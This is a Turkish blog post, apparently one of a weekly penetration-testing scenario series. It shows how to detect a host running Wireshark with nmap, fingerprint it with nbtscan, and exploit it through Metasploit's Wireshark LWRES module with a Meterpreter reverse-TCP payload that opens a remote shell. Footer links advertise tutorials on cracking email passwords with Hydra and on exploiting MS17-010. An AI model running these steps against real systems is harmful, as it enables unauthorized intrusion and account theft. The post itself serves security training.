Sızma Testi Senaryosu - Bölüm 2

Merhaba,

Bir önceki konumdada dediğim gibi, inşAllah her hafta 1 tane sızma testi senaryosu hazırlayıp paylaşacagım.

Burada amacımız üzerinde sniffer çalışan (Wireshark vb.) bir sistemi tespit etmek olacak.
Sniffing yapıp yapmadığını tespit etmemiz gerekiyor, bunun için terminal’i açıyoruz ve nmap ile tespit
işlemini gerçekleştiriyoruz, konsola “nmap –script=sniffer-detect ” şekline yazıyoruz.
Aşağıda görüldüğü gibi hedef sistem sniffing yapıyor. Gönderdiğimiz isteğe dönen “Host script
results:” kısmında (tests: ”1111111111”) yazıyor ve bu sniffer çalıştığı anlamına gelmektedir.
Şimdi ise hedef sistemin makina ismini öğrenelim, bunun için nbtscan aracını kullanacagız, kullanımı "nbtscan HEDEF IP" şeklindedir. Görüldüğü gibi hedef sistemin makina adı Wireshark-V125.
Şimdi ise wireshark sürümünü google üzerinden search ediyoruz ve sonuna exploit kelimesini ekliyoruz. Görüldüğü gibi buffer exploiti varmış.
Şimdi saldırı işlemine geçmek için ise terminal satırına “msfconsole” yazarak metasploit çalıştırılır.Ardından “search wireshark 1.2.5” şekline arama yapılır ve
“exploit/multi/misc/wireshark_lwres_getaddrbyname_loop” exploiti kopyalanır ve “use” komutu
ile “use exploit/multi/misc/wireshark_lwres_getaddrbyname_loop” şeklinde exploit dizinine geçilir.
“show options” komutu ile exploit hakkında bilgi alınır ve gerekli yerler “set” komutu ile doldurulur.
Örnek komutlar aşağıdaki gibidir.
Set DELAY 2 ------- Delay değeri belirtilir.
Set INTERFACE eth0 ------- Ağ kartı ismi belirtilir.
Set PAYLOAD windows/meterpreter/reverse_tcp --- Payload belirtilir.
Set LHOST Belirtilir.
Set LPORT Belirtilir.
Son olarak run komutu ile sömürme işlemi başlatılır, görüldüğü gibi bağlantı geldi “Enter” tuşuna basıyoruz.
Ardından ise “session” komutu ile gelen bağlantının ID’sini öğreniyoruz ve “session –i ID” şeklinde bağlantıyı gerçekleştiriyoruz.
Güvenli Günler

Yorumlar

Bu blogdaki popüler yayınlar

Hydra İle BruteForce Attack Yaparak Nasil Hotmail/Gmail/Yahoo Şifreleri Kırılır ( Hacking )

MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme

Sızma Testi Senaryosu - Bölüm 1